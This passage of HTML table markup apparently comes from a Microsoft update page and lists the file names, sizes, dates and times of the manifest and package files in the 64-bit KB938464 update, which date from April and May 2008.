class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_27a0a8b8c122d4baa3395a823c4a04fb_6595b64144ccf1df_1.0.6001.18065_none_03ff18594e33f5a4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_3c9e2cb91c78c7f3f101359176702865_6595b64144ccf1df_1.1.6000.16683_none_fb86e2bd89a4d682.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_45503531deef0e7c4e9173d38c251740_6595b64144ccf1df_1.0.6001.18065_none_96199079c9b8906a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_4e4fa89d16c400ad6000541644ed55ac_6595b64144ccf1df_1.1.6001.18065_none_ed1070135ecfb3fb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_69f5ac176b95ecd08940cb177ba7542c_6595b64144ccf1df_1.0.6001.22170_none_d57e13e47f54f690.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_88ddaac2945c38ad04164fc29389ec8a_6595b64144ccf1df_1.1.6001.18065_none_1aecf13675d8c994.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_8b3e3b7243c63b9899fc426a7fd2bfb4_6595b64144ccf1df_1.0.6000.16683_none_7c94e478ae8e6ff3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_921e0f54875b67491f0b0ea3492c6869_6595b64144ccf1df_1.1.6001.22170_none_3c0774abf3bc54cb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_baa222e60433506acabc1c70e033be52_6595b64144ccf1df_1.1.6000.20826_none_aae1052b645a16e9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_c0d5b323f54215ab9bc6144b3844cd42_6595b64144ccf1df_1.0.6000.16683_none_f7cb434290b2f4df.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_f2b615498118f74ce531322e9fae8f12_6595b64144ccf1df_1.0.6000.20826_none_f588c793f1fa420f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_f771c2ccc8989c364bf72efbfd9def9f_6595b64144ccf1df_1.1.6001.22170_none_4b1226a6a917f35c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.16683_none_56f3b9b3b4f1fc31.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:13</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.20826_none_401fccbbce9f1161.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:48</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.18065_none_56cd8757b545091c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">10:34</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.22170_none_400152c9ceeb0254.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.16683_none_464528984df7d5d8.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:16</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.20826_none_2f713ba067a4eb08.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:53</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.18065_none_461ef63c4e4ae2c3.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">10:39</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.22170_none_2f52c1ae67f0dbfb.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,178</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,252</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_1_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,519</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,735</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_2_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,348</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,575</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_3_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,577</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_4_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,188</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb938464_bf~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">2,577</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_5_for_kb938464~31bf3856ad364e35~amd64~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 